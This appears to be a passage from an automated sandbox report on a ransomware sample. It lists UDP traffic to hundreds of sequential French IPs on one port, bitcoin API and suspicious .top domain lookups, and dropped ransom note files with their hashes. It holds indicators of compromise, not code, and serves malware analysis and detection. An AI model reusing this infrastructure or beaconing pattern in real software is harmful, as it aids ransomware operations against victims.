| FR | 178.33.161.201:6893 | udp | |
| FR | 178.33.161.202:6893 | udp | |
| FR | 178.33.161.203:6893 | udp | |
| FR | 178.33.161.204:6893 | udp | |
| FR | 178.33.161.205:6893 | udp | |
| FR | 178.33.161.206:6893 | udp | |
| FR | 178.33.161.207:6893 | udp | |
| FR | 178.33.161.208:6893 | udp | |
| FR | 178.33.161.209:6893 | udp | |
| FR | 178.33.161.210:6893 | udp | |
| FR | 178.33.161.211:6893 | udp | |
| FR | 178.33.161.212:6893 | udp | |
| FR | 178.33.161.213:6893 | udp | |
| FR | 178.33.161.214:6893 | udp | |
| FR | 178.33.161.215:6893 | udp | |
| FR | 178.33.161.216:6893 | udp | |
| FR | 178.33.161.217:6893 | udp | |
| FR | 178.33.161.218:6893 | udp | |
| FR | 178.33.161.219:6893 | udp | |
| FR | 178.33.161.220:6893 | udp | |
| FR | 178.33.161.221:6893 | udp | |
| FR | 178.33.161.222:6893 | udp | |
| FR | 178.33.161.223:6893 | udp | |
| FR | 178.33.161.224:6893 | udp | |
| FR | 178.33.161.225:6893 | udp | |
| FR | 178.33.161.226:6893 | udp | |
| FR | 178.33.161.227:6893 | udp | |
| FR | 178.33.161.228:6893 | udp | |
| FR | 178.33.161.229:6893 | udp | |
| FR | 178.33.161.230:6893 | udp | |
| FR | 178.33.161.231:6893 | udp | |
| FR | 178.33.161.232:6893 | udp | |
| FR | 178.33.161.233:6893 | udp | |
| FR | 178.33.161.234:6893 | udp | |
| FR | 178.33.161.235:6893 | udp | |
| FR | 178.33.161.236:6893 | udp | |
| FR | 178.33.161.237:6893 | udp | |
| FR | 178.33.161.238:6893 | udp | |
| FR | 178.33.161.239:6893 | udp | |
| FR | 178.33.161.240:6893 | udp | |
| FR | 178.33.161.241:6893 | udp | |
| FR | 178.33.161.242:6893 | udp | |
| FR | 178.33.161.243:6893 | udp | |
| FR | 178.33.161.244:6893 | udp | |
| FR | 178.33.161.245:6893 | udp | |
| FR | 178.33.161.246:6893 | udp | |
| FR | 178.33.161.247:6893 | udp | |
| FR | 178.33.161.248:6893 | udp | |
| FR | 178.33.161.249:6893 | udp | |
| FR | 178.33.161.250:6893 | udp | |
| FR | 178.33.161.251:6893 | udp | |
| FR | 178.33.161.252:6893 | udp | |
| FR | 178.33.161.253:6893 | udp | |
| FR | 178.33.161.254:6893 | udp | |
| FR | 178.33.161.255:6893 | udp | |
| FR | 178.33.162.0:6893 | udp | |
| FR | 178.33.162.1:6893 | udp | |
| FR | 178.33.162.2:6893 | udp | |
| FR | 178.33.162.3:6893 | udp | |
| FR | 178.33.162.4:6893 | udp | |
| FR | 178.33.162.5:6893 | udp | |
| FR | 178.33.162.6:6893 | udp | |
| FR | 178.33.162.7:6893 | udp | |
| FR | 178.33.162.8:6893 | udp | |
| FR | 178.33.162.9:6893 | udp | |
| FR | 178.33.162.10:6893 | udp | |
| FR | 178.33.162.11:6893 | udp | |
| FR | 178.33.162.12:6893 | udp | |
| FR | 178.33.162.13:6893 | udp | |
| FR | 178.33.162.14:6893 | udp | |
| FR | 178.33.162.15:6893 | udp | |
| FR | 178.33.162.16:6893 | udp | |
| FR | 178.33.162.17:6893 | udp | |
| FR | 178.33.162.18:6893 | udp | |
| FR | 178.33.162.19:6893 | udp | |
| FR | 178.33.162.20:6893 | udp | |
| FR | 178.33.162.21:6893 | udp | |
| FR | 178.33.162.22:6893 | udp | |
| FR | 178.33.162.23:6893 | udp | |
| FR | 178.33.162.24:6893 | udp | |
| FR | 178.33.162.25:6893 | udp | |
| FR | 178.33.162.26:6893 | udp | |
| FR | 178.33.162.27:6893 | udp | |
| FR | 178.33.162.28:6893 | udp | |
| FR | 178.33.162.29:6893 | udp | |
| FR | 178.33.162.30:6893 | udp | |
| FR | 178.33.162.31:6893 | udp | |
| FR | 178.33.162.32:6893 | udp | |
| FR | 178.33.162.33:6893 | udp | |
| FR | 178.33.162.34:6893 | udp | |
| FR | 178.33.162.35:6893 | udp | |
| FR | 178.33.162.36:6893 | udp | |
| FR | 178.33.162.37:6893 | udp | |
| FR | 178.33.162.38:6893 | udp | |
| FR | 178.33.162.39:6893 | udp | |
| FR | 178.33.162.40:6893 | udp | |
| FR | 178.33.162.41:6893 | udp | |
| FR | 178.33.162.42:6893 | udp | |
| FR | 178.33.162.43:6893 | udp | |
| FR | 178.33.162.44:6893 | udp | |
| FR | 178.33.162.45:6893 | udp | |
| FR | 178.33.162.46:6893 | udp | |
| FR | 178.33.162.47:6893 | udp | |
| FR | 178.33.162.48:6893 | udp | |
| FR | 178.33.162.49:6893 | udp | |
| FR | 178.33.162.50:6893 | udp | |
| FR | 178.33.162.51:6893 | udp | |
| FR | 178.33.162.52:6893 | udp | |
| FR | 178.33.162.53:6893 | udp | |
| FR | 178.33.162.54:6893 | udp | |
| FR | 178.33.162.55:6893 | udp | |
| FR | 178.33.162.56:6893 | udp | |
| FR | 178.33.162.57:6893 | udp | |
| FR | 178.33.162.58:6893 | udp | |
| FR | 178.33.162.59:6893 | udp | |
| FR | 178.33.162.60:6893 | udp | |
| FR | 178.33.162.61:6893 | udp | |
| FR | 178.33.162.62:6893 | udp | |
| FR | 178.33.162.63:6893 | udp | |
| FR | 178.33.162.64:6893 | udp | |
| FR | 178.33.162.65:6893 | udp | |
| FR | 178.33.162.66:6893 | udp | |
| FR | 178.33.162.67:6893 | udp | |
| FR | 178.33.162.68:6893 | udp | |
| FR | 178.33.162.69:6893 | udp | |
| FR | 178.33.162.70:6893 | udp | |
| FR | 178.33.162.71:6893 | udp | |
| FR | 178.33.162.72:6893 | udp | |
| FR | 178.33.162.73:6893 | udp | |
| FR | 178.33.162.74:6893 | udp | |
| FR | 178.33.162.75:6893 | udp | |
| FR | 178.33.162.76:6893 | udp | |
| FR | 178.33.162.77:6893 | udp | |
| FR | 178.33.162.78:6893 | udp | |
| FR | 178.33.162.79:6893 | udp | |
| FR | 178.33.162.80:6893 | udp | |
| FR | 178.33.162.81:6893 | udp | |
| FR | 178.33.162.82:6893 | udp | |
| FR | 178.33.162.83:6893 | udp | |
| FR | 178.33.162.84:6893 | udp | |
| FR | 178.33.162.85:6893 | udp | |
| FR | 178.33.162.86:6893 | udp | |
| FR | 178.33.162.87:6893 | udp | |
| FR | 178.33.162.88:6893 | udp | |
| FR | 178.33.162.89:6893 | udp | |
| FR | 178.33.162.90:6893 | udp | |
| FR | 178.33.162.91:6893 | udp | |
| FR | 178.33.162.92:6893 | udp | |
| FR | 178.33.162.93:6893 | udp | |
| FR | 178.33.162.94:6893 | udp | |
| FR | 178.33.162.95:6893 | udp | |
| FR | 178.33.162.96:6893 | udp | |
| FR | 178.33.162.97:6893 | udp | |
| FR | 178.33.162.98:6893 | udp | |
| FR | 178.33.162.99:6893 | udp | |
| FR | 178.33.162.100:6893 | udp | |
| FR | 178.33.162.101:6893 | udp | |
| FR | 178.33.162.102:6893 | udp | |
| FR | 178.33.162.103:6893 | udp | |
| FR | 178.33.162.104:6893 | udp | |
| FR | 178.33.162.105:6893 | udp | |
| FR | 178.33.162.106:6893 | udp | |
| FR | 178.33.162.107:6893 | udp | |
| FR | 178.33.162.108:6893 | udp | |
| FR | 178.33.162.109:6893 | udp | |
| FR | 178.33.162.110:6893 | udp | |
| FR | 178.33.162.111:6893 | udp | |
| FR | 178.33.162.112:6893 | udp | |
| FR | 178.33.162.113:6893 | udp | |
| FR | 178.33.162.114:6893 | udp | |
| FR | 178.33.162.115:6893 | udp | |
| FR | 178.33.162.116:6893 | udp | |
| FR | 178.33.162.117:6893 | udp | |
| FR | 178.33.162.118:6893 | udp | |
| FR | 178.33.162.119:6893 | udp | |
| FR | 178.33.162.120:6893 | udp | |
| FR | 178.33.162.121:6893 | udp | |
| FR | 178.33.162.122:6893 | udp | |
| FR | 178.33.162.123:6893 | udp | |
| FR | 178.33.162.124:6893 | udp | |
| FR | 178.33.162.125:6893 | udp | |
| FR | 178.33.162.126:6893 | udp | |
| FR | 178.33.162.127:6893 | udp | |
| FR | 178.33.162.128:6893 | udp | |
| FR | 178.33.162.129:6893 | udp | |
| FR | 178.33.162.130:6893 | udp | |
| FR | 178.33.162.131:6893 | udp | |
| FR | 178.33.162.132:6893 | udp | |
| FR | 178.33.162.133:6893 | udp | |
| FR | 178.33.162.134:6893 | udp | |
| FR | 178.33.162.135:6893 | udp | |
| FR | 178.33.162.136:6893 | udp | |
| FR | 178.33.162.137:6893 | udp | |
| FR | 178.33.162.138:6893 | udp | |
| FR | 178.33.162.139:6893 | udp | |
| FR | 178.33.162.140:6893 | udp | |
| FR | 178.33.162.141:6893 | udp | |
| FR | 178.33.162.142:6893 | udp | |
| FR | 178.33.162.143:6893 | udp | |
| FR | 178.33.162.144:6893 | udp | |
| FR | 178.33.162.145:6893 | udp | |
| FR | 178.33.162.146:6893 | udp | |
| FR | 178.33.162.147:6893 | udp | |
| FR | 178.33.162.148:6893 | udp | |
| FR | 178.33.162.149:6893 | udp | |
| FR | 178.33.162.150:6893 | udp | |
| FR | 178.33.162.151:6893 | udp | |
| FR | 178.33.162.152:6893 | udp | |
| FR | 178.33.162.153:6893 | udp | |
| FR | 178.33.162.154:6893 | udp | |
| FR | 178.33.162.155:6893 | udp | |
| FR | 178.33.162.156:6893 | udp | |
| FR | 178.33.162.157:6893 | udp | |
| FR | 178.33.162.158:6893 | udp | |
| FR | 178.33.162.159:6893 | udp | |
| FR | 178.33.162.160:6893 | udp | |
| FR | 178.33.162.161:6893 | udp | |
| FR | 178.33.162.162:6893 | udp | |
| FR | 178.33.162.163:6893 | udp | |
| FR | 178.33.162.164:6893 | udp | |
| FR | 178.33.162.165:6893 | udp | |
| FR | 178.33.162.166:6893 | udp | |
| FR | 178.33.162.167:6893 | udp | |
| FR | 178.33.162.168:6893 | udp | |
| FR | 178.33.162.169:6893 | udp | |
| FR | 178.33.162.170:6893 | udp | |
| FR | 178.33.162.171:6893 | udp | |
| FR | 178.33.162.172:6893 | udp | |
| FR | 178.33.162.173:6893 | udp | |
| FR | 178.33.162.174:6893 | udp | |
| FR | 178.33.162.175:6893 | udp | |
| FR | 178.33.162.176:6893 | udp | |
| FR | 178.33.162.177:6893 | udp | |
| FR | 178.33.162.178:6893 | udp | |
| FR | 178.33.162.179:6893 | udp | |
| FR | 178.33.162.180:6893 | udp | |
| FR | 178.33.162.181:6893 | udp | |
| FR | 178.33.162.182:6893 | udp | |
| FR | 178.33.162.183:6893 | udp | |
| FR | 178.33.162.184:6893 | udp | |
| FR | 178.33.162.185:6893 | udp | |
| FR | 178.33.162.186:6893 | udp | |
| FR | 178.33.162.187:6893 | udp | |
| FR | 178.33.162.188:6893 | udp | |
| FR | 178.33.162.189:6893 | udp | |
| FR | 178.33.162.190:6893 | udp | |
| FR | 178.33.162.191:6893 | udp | |
| FR | 178.33.162.192:6893 | udp | |
| FR | 178.33.162.193:6893 | udp | |
| FR | 178.33.162.194:6893 | udp | |
| FR | 178.33.162.195:6893 | udp | |
| FR | 178.33.162.196:6893 | udp | |
| FR | 178.33.162.197:6893 | udp | |
| FR | 178.33.162.198:6893 | udp | |
| FR | 178.33.162.199:6893 | udp | |
| FR | 178.33.162.200:6893 | udp | |
| FR | 178.33.162.201:6893 | udp | |
| FR | 178.33.162.202:6893 | udp | |
| FR | 178.33.162.203:6893 | udp | |
| FR | 178.33.162.204:6893 | udp | |
| FR | 178.33.162.205:6893 | udp | |
| FR | 178.33.162.206:6893 | udp | |
| FR | 178.33.162.207:6893 | udp | |
| FR | 178.33.162.208:6893 | udp | |
| FR | 178.33.162.209:6893 | udp | |
| FR | 178.33.162.210:6893 | udp | |
| FR | 178.33.162.211:6893 | udp | |
| FR | 178.33.162.212:6893 | udp | |
| FR | 178.33.162.213:6893 | udp | |
| FR | 178.33.162.214:6893 | udp | |
| FR | 178.33.162.215:6893 | udp | |
| FR | 178.33.162.216:6893 | udp | |
| FR | 178.33.162.217:6893 | udp | |
| FR | 178.33.162.218:6893 | udp | |
| FR | 178.33.162.219:6893 | udp | |
| FR | 178.33.162.220:6893 | udp | |
| FR | 178.33.162.221:6893 | udp | |
| FR | 178.33.162.222:6893 | udp | |
| FR | 178.33.162.223:6893 | udp | |
| FR | 178.33.162.224:6893 | udp | |
| FR | 178.33.162.225:6893 | udp | |
| FR | 178.33.162.226:6893 | udp | |
| FR | 178.33.162.227:6893 | udp | |
| FR | 178.33.162.228:6893 | udp | |
| FR | 178.33.162.229:6893 | udp | |
| FR | 178.33.162.230:6893 | udp | |
| FR | 178.33.162.231:6893 | udp | |
| FR | 178.33.162.232:6893 | udp | |
| FR | 178.33.162.233:6893 | udp | |
| FR | 178.33.162.234:6893 | udp | |
| FR | 178.33.162.235:6893 | udp | |
| FR | 178.33.162.236:6893 | udp | |
| FR | 178.33.162.237:6893 | udp | |
| FR | 178.33.162.238:6893 | udp | |
| FR | 178.33.162.239:6893 | udp | |
| FR | 178.33.162.240:6893 | udp | |
| FR | 178.33.162.241:6893 | udp | |
| FR | 178.33.162.242:6893 | udp | |
| FR | 178.33.162.243:6893 | udp | |
| FR | 178.33.162.244:6893 | udp | |
| FR | 178.33.162.245:6893 | udp | |
| FR | 178.33.162.246:6893 | udp | |
| FR | 178.33.162.247:6893 | udp | |
| FR | 178.33.162.248:6893 | udp | |
| FR | 178.33.162.249:6893 | udp | |
| FR | 178.33.162.250:6893 | udp | |
| FR | 178.33.162.251:6893 | udp | |
| FR | 178.33.162.252:6893 | udp | |
| FR | 178.33.162.253:6893 | udp | |
| FR | 178.33.162.254:6893 | udp | |
| FR | 178.33.162.255:6893 | udp | |
| FR | 178.33.163.0:6893 | udp | |
| FR | 178.33.163.1:6893 | udp | |
| FR | 178.33.163.2:6893 | udp | |
| FR | 178.33.163.3:6893 | udp | |
| FR | 178.33.163.4:6893 | udp | |
| FR | 178.33.163.5:6893 | udp | |
| FR | 178.33.163.6:6893 | udp | |
| FR | 178.33.163.7:6893 | udp | |
| FR | 178.33.163.8:6893 | udp | |
| FR | 178.33.163.9:6893 | udp | |
| FR | 178.33.163.10:6893 | udp | |
| FR | 178.33.163.11:6893 | udp | |
| FR | 178.33.163.12:6893 | udp | |
| FR | 178.33.163.13:6893 | udp | |
| FR | 178.33.163.14:6893 | udp | |
| FR | 178.33.163.15:6893 | udp | |
| FR | 178.33.163.16:6893 | udp | |
| FR | 178.33.163.17:6893 | udp | |
| FR | 178.33.163.18:6893 | udp | |
| FR | 178.33.163.19:6893 | udp | |
| FR | 178.33.163.20:6893 | udp | |
| FR | 178.33.163.21:6893 | udp | |
| FR | 178.33.163.22:6893 | udp | |
| FR | 178.33.163.23:6893 | udp | |
| FR | 178.33.163.24:6893 | udp | |
| FR | 178.33.163.25:6893 | udp | |
| FR | 178.33.163.26:6893 | udp | |
| FR | 178.33.163.27:6893 | udp | |
| FR | 178.33.163.28:6893 | udp | |
| FR | 178.33.163.29:6893 | udp | |
| FR | 178.33.163.30:6893 | udp | |
| FR | 178.33.163.31:6893 | udp | |
| FR | 178.33.163.32:6893 | udp | |
| FR | 178.33.163.33:6893 | udp | |
| FR | 178.33.163.34:6893 | udp | |
| FR | 178.33.163.35:6893 | udp | |
| FR | 178.33.163.36:6893 | udp | |
| FR | 178.33.163.37:6893 | udp | |
| FR | 178.33.163.38:6893 | udp | |
| FR | 178.33.163.39:6893 | udp | |
| FR | 178.33.163.40:6893 | udp | |
| FR | 178.33.163.41:6893 | udp | |
| FR | 178.33.163.42:6893 | udp | |
| FR | 178.33.163.43:6893 | udp | |
| FR | 178.33.163.44:6893 | udp | |
| FR | 178.33.163.45:6893 | udp | |
| FR | 178.33.163.46:6893 | udp | |
| FR | 178.33.163.47:6893 | udp | |
| FR | 178.33.163.48:6893 | udp | |
| FR | 178.33.163.49:6893 | udp | |
| FR | 178.33.163.50:6893 | udp | |
| FR | 178.33.163.51:6893 | udp | |
| FR | 178.33.163.52:6893 | udp | |
| FR | 178.33.163.53:6893 | udp | |
| FR | 178.33.163.54:6893 | udp | |
| FR | 178.33.163.55:6893 | udp | |
| FR | 178.33.163.56:6893 | udp | |
| FR | 178.33.163.57:6893 | udp | |
| FR | 178.33.163.58:6893 | udp | |
| FR | 178.33.163.59:6893 | udp | |
| FR | 178.33.163.60:6893 | udp | |
| FR | 178.33.163.61:6893 | udp | |
| FR | 178.33.163.62:6893 | udp | |
| FR | 178.33.163.63:6893 | udp | |
| FR | 178.33.163.64:6893 | udp | |
| FR | 178.33.163.65:6893 | udp | |
| FR | 178.33.163.66:6893 | udp | |
| FR | 178.33.163.67:6893 | udp | |
| FR | 178.33.163.68:6893 | udp | |
| FR | 178.33.163.69:6893 | udp | |
| FR | 178.33.163.70:6893 | udp | |
| FR | 178.33.163.71:6893 | udp | |
| FR | 178.33.163.72:6893 | udp | |
| FR | 178.33.163.73:6893 | udp | |
| FR | 178.33.163.74:6893 | udp | |
| FR | 178.33.163.75:6893 | udp | |
| FR | 178.33.163.76:6893 | udp | |
| FR | 178.33.163.77:6893 | udp | |
| FR | 178.33.163.78:6893 | udp | |
| FR | 178.33.163.79:6893 | udp | |
| FR | 178.33.163.80:6893 | udp | |
| FR | 178.33.163.81:6893 | udp | |
| FR | 178.33.163.82:6893 | udp | |
| FR | 178.33.163.83:6893 | udp | |
| FR | 178.33.163.84:6893 | udp | |
| FR | 178.33.163.85:6893 | udp | |
| FR | 178.33.163.86:6893 | udp | |
| FR | 178.33.163.87:6893 | udp | |
| FR | 178.33.163.88:6893 | udp | |
| FR | 178.33.163.89:6893 | udp | |
| FR | 178.33.163.90:6893 | udp | |
| FR | 178.33.163.91:6893 | udp | |
| FR | 178.33.163.92:6893 | udp | |
| FR | 178.33.163.93:6893 | udp | |
| FR | 178.33.163.94:6893 | udp | |
| FR | 178.33.163.95:6893 | udp | |
| FR | 178.33.163.96:6893 | udp | |
| FR | 178.33.163.97:6893 | udp | |
| FR | 178.33.163.98:6893 | udp | |
| FR | 178.33.163.99:6893 | udp | |
| FR | 178.33.163.100:6893 | udp | |
| FR | 178.33.163.101:6893 | udp | |
| FR | 178.33.163.102:6893 | udp | |
| FR | 178.33.163.103:6893 | udp | |
| FR | 178.33.163.104:6893 | udp | |
| FR | 178.33.163.105:6893 | udp | |
| FR | 178.33.163.106:6893 | udp | |
| FR | 178.33.163.107:6893 | udp | |
| FR | 178.33.163.108:6893 | udp | |
| FR | 178.33.163.109:6893 | udp | |
| FR | 178.33.163.110:6893 | udp | |
| FR | 178.33.163.111:6893 | udp | |
| FR | 178.33.163.112:6893 | udp | |
| FR | 178.33.163.113:6893 | udp | |
| FR | 178.33.163.114:6893 | udp | |
| FR | 178.33.163.115:6893 | udp | |
| FR | 178.33.163.116:6893 | udp | |
| FR | 178.33.163.117:6893 | udp | |
| FR | 178.33.163.118:6893 | udp | |
| FR | 178.33.163.119:6893 | udp | |
| FR | 178.33.163.120:6893 | udp | |
| FR | 178.33.163.121:6893 | udp | |
| FR | 178.33.163.122:6893 | udp | |
| FR | 178.33.163.123:6893 | udp | |
| FR | 178.33.163.124:6893 | udp | |
| FR | 178.33.163.125:6893 | udp | |
| FR | 178.33.163.126:6893 | udp | |
| FR | 178.33.163.127:6893 | udp | |
| FR | 178.33.163.128:6893 | udp | |
| FR | 178.33.163.129:6893 | udp | |
| FR | 178.33.163.130:6893 | udp | |
| FR | 178.33.163.131:6893 | udp | |
| FR | 178.33.163.132:6893 | udp | |
| FR | 178.33.163.133:6893 | udp | |
| FR | 178.33.163.134:6893 | udp | |
| FR | 178.33.163.135:6893 | udp | |
| FR | 178.33.163.136:6893 | udp | |
| FR | 178.33.163.137:6893 | udp | |
| FR | 178.33.163.138:6893 | udp | |
| FR | 178.33.163.139:6893 | udp | |
| FR | 178.33.163.140:6893 | udp | |
| FR | 178.33.163.141:6893 | udp | |
| FR | 178.33.163.142:6893 | udp | |
| FR | 178.33.163.143:6893 | udp | |
| FR | 178.33.163.144:6893 | udp | |
| FR | 178.33.163.145:6893 | udp | |
| FR | 178.33.163.146:6893 | udp | |
| FR | 178.33.163.147:6893 | udp | |
| FR | 178.33.163.148:6893 | udp | |
| FR | 178.33.163.149:6893 | udp | |
| FR | 178.33.163.150:6893 | udp | |
| FR | 178.33.163.151:6893 | udp | |
| FR | 178.33.163.152:6893 | udp | |
| FR | 178.33.163.153:6893 | udp | |
| FR | 178.33.163.154:6893 | udp | |
| FR | 178.33.163.155:6893 | udp | |
| FR | 178.33.163.156:6893 | udp | |
| FR | 178.33.163.157:6893 | udp | |
| FR | 178.33.163.158:6893 | udp | |
| FR | 178.33.163.159:6893 | udp | |
| FR | 178.33.163.160:6893 | udp | |
| FR | 178.33.163.161:6893 | udp | |
| FR | 178.33.163.162:6893 | udp | |
| FR | 178.33.163.163:6893 | udp | |
| FR | 178.33.163.164:6893 | udp | |
| FR | 178.33.163.165:6893 | udp | |
| FR | 178.33.163.166:6893 | udp | |
| FR | 178.33.163.167:6893 | udp | |
| FR | 178.33.163.168:6893 | udp | |
| FR | 178.33.163.169:6893 | udp | |
| FR | 178.33.163.170:6893 | udp | |
| FR | 178.33.163.171:6893 | udp | |
| FR | 178.33.163.172:6893 | udp | |
| FR | 178.33.163.173:6893 | udp | |
| FR | 178.33.163.174:6893 | udp | |
| FR | 178.33.163.175:6893 | udp | |
| FR | 178.33.163.176:6893 | udp | |
| FR | 178.33.163.177:6893 | udp | |
| FR | 178.33.163.178:6893 | udp | |
| FR | 178.33.163.179:6893 | udp | |
| FR | 178.33.163.180:6893 | udp | |
| FR | 178.33.163.181:6893 | udp | |
| FR | 178.33.163.182:6893 | udp | |
| FR | 178.33.163.183:6893 | udp | |
| FR | 178.33.163.184:6893 | udp | |
| FR | 178.33.163.185:6893 | udp | |
| FR | 178.33.163.186:6893 | udp | |
| FR | 178.33.163.187:6893 | udp | |
| FR | 178.33.163.188:6893 | udp | |
| FR | 178.33.163.189:6893 | udp | |
| FR | 178.33.163.190:6893 | udp | |
| FR | 178.33.163.191:6893 | udp | |
| FR | 178.33.163.192:6893 | udp | |
| FR | 178.33.163.193:6893 | udp | |
| FR | 178.33.163.194:6893 | udp | |
| FR | 178.33.163.195:6893 | udp | |
| FR | 178.33.163.196:6893 | udp | |
| FR | 178.33.163.197:6893 | udp | |
| FR | 178.33.163.198:6893 | udp | |
| FR | 178.33.163.199:6893 | udp | |
| FR | 178.33.163.200:6893 | udp | |
| FR | 178.33.163.201:6893 | udp | |
| FR | 178.33.163.202:6893 | udp | |
| FR | 178.33.163.203:6893 | udp | |
| FR | 178.33.163.204:6893 | udp | |
| FR | 178.33.163.205:6893 | udp | |
| FR | 178.33.163.206:6893 | udp | |
| FR | 178.33.163.207:6893 | udp | |
| FR | 178.33.163.208:6893 | udp | |
| FR | 178.33.163.209:6893 | udp | |
| FR | 178.33.163.210:6893 | udp | |
| FR | 178.33.163.211:6893 | udp | |
| FR | 178.33.163.212:6893 | udp | |
| FR | 178.33.163.213:6893 | udp | |
| FR | 178.33.163.214:6893 | udp | |
| FR | 178.33.163.215:6893 | udp | |
| FR | 178.33.163.216:6893 | udp | |
| FR | 178.33.163.217:6893 | udp | |
| FR | 178.33.163.218:6893 | udp | |
| FR | 178.33.163.219:6893 | udp | |
| FR | 178.33.163.220:6893 | udp | |
| FR | 178.33.163.221:6893 | udp | |
| FR | 178.33.163.222:6893 | udp | |
| FR | 178.33.163.223:6893 | udp | |
| FR | 178.33.163.224:6893 | udp | |
| FR | 178.33.163.225:6893 | udp | |
| FR | 178.33.163.226:6893 | udp | |
| FR | 178.33.163.227:6893 | udp | |
| FR | 178.33.163.228:6893 | udp | |
| FR | 178.33.163.229:6893 | udp | |
| FR | 178.33.163.230:6893 | udp | |
| FR | 178.33.163.231:6893 | udp | |
| FR | 178.33.163.232:6893 | udp | |
| FR | 178.33.163.233:6893 | udp | |
| FR | 178.33.163.234:6893 | udp | |
| FR | 178.33.163.235:6893 | udp | |
| FR | 178.33.163.236:6893 | udp | |
| FR | 178.33.163.237:6893 | udp | |
| FR | 178.33.163.238:6893 | udp | |
| FR | 178.33.163.239:6893 | udp | |
| FR | 178.33.163.240:6893 | udp | |
| FR | 178.33.163.241:6893 | udp | |
| FR | 178.33.163.242:6893 | udp | |
| FR | 178.33.163.243:6893 | udp | |
| FR | 178.33.163.244:6893 | udp | |
| FR | 178.33.163.245:6893 | udp | |
| FR | 178.33.163.246:6893 | udp | |
| FR | 178.33.163.247:6893 | udp | |
| FR | 178.33.163.248:6893 | udp | |
| FR | 178.33.163.249:6893 | udp | |
| FR | 178.33.163.250:6893 | udp | |
| FR | 178.33.163.251:6893 | udp | |
| FR | 178.33.163.252:6893 | udp | |
| FR | 178.33.163.253:6893 | udp | |
| FR | 178.33.163.254:6893 | udp | |
| FR | 178.33.163.255:6893 | udp | |
| US | 8.8.8.8:53 | api.blockcypher.com | udp |
| US | 104.20.99.10:80 | api.blockcypher.com | tcp |
| US | 8.8.8.8:53 | btc.blockr.io | udp |
| US | 8.8.8.8:53 | bitaps.com | udp |
| NL | 178.128.255.179:443 | bitaps.com | tcp |
| US | 8.8.8.8:53 | chain.so | udp |
| US | 172.67.40.90:443 | chain.so | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | p27dokhpz2n7nvgr.12hygy.top | udp |
| US | 8.8.8.8:53 | p27dokhpz2n7nvgr.12hygy.top | udp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 88.221.134.83:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 184.25.193.234:80 | www.microsoft.com | tcp |
Files
memory/2856-0-0x0000000000220000-0x0000000000251000-memory.dmp
memory/2856-1-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2856-2-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2856-5-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2856-9-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2856-48-0x0000000000400000-0x0000000000435000-memory.dmp
C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___75WVLOZ_.hta
| MD5 | d5791064a756a563d36675d9018c8b37 |
| SHA1 | cfcc3520c34f2d6b2ffa0c2e18232a703c857718 |
| SHA256 | 76fef31abd1a3d2173e1015f02717890681238e9f955787c5ea93ae9022b4b42 |
| SHA512 | f701eff8066781904203e294ee6c37dfcd2d120539ee5a1a2c204dfb134c276b88e43483a6e566bf6d1246ac88ec9d2634cd7da655d552ac44cac7d2a62b09e9 |
C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___CXIFPVMR_.txt
| MD5 | 9be9af5fc5859149ce42464b4d60551a |
| SHA1 | 52ca768486b1e3ee6acfbbe4534b20f4555ce30b |
| SHA256 | 071195840ee87b148a23049d93570807b72932dbe0cecb49a1f0a510c3a30f95 |
| SHA512 | 9499ee236a01935aff0abfb5dc959c9d2cbe698f5f68c992d3fd1dec659b66297b899aa25d5f5f0e12226bcee3ca217a1cf7d119fa6bb48fa3b589eec6ccdc5c |
memory/2856-72-0x0000000000400000-0x0000000000435000-memory.dmp
memory/2856-89-0x0000000000400000-0x0000000000435000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab982C.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar983F.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f17343e305d560e269f0a75584c431fb |
| SHA1 | 3819fd3e2d55e840b2550c11f7fa4890edb7758c |
| SHA256 | d5758c7aae8df64a13488a8229075d7d0fb373469401f93eacf05413aa6e2c8d |
| SHA512 | af6f7ff4de61e50d0d81b6c13b0e8d6c03e51d49032c9e2f9c7c60418e459c960cace3971206c74c502ccf47af2e85ac415f4351cf9328d3db2d19cf4b3ceb22 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 118dd7c1851cddc2f54656ff9c86c76b |
| SHA1 | d0993c1a8df10aaa6e466da72f391941e5ddbcb9 |
| SHA256 | 1e603c27e4a5c1b0c7c5422570317a2bb0cc1ec49f09d635ff194a2858966fc1 |
| SHA512 | eca5ecb0ead0a9d6a0a0359d3c6e1257cd5ccea2536f53275ca75e836d8e616eacb127a650c1f9f06a7c9a8fc542659d3e25f4ac99e7962916c81746e33eab91 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 94a61eb3ea57bac14d93b896e8e71352 |
| SHA1 | 588c02ae11215d52f964667a900963d946768f8f |
| SHA256 | 4aca5cee9dc2ad3298f280ff7f818c30bf1628b0bdfb205f747e76673aa9cb39 |
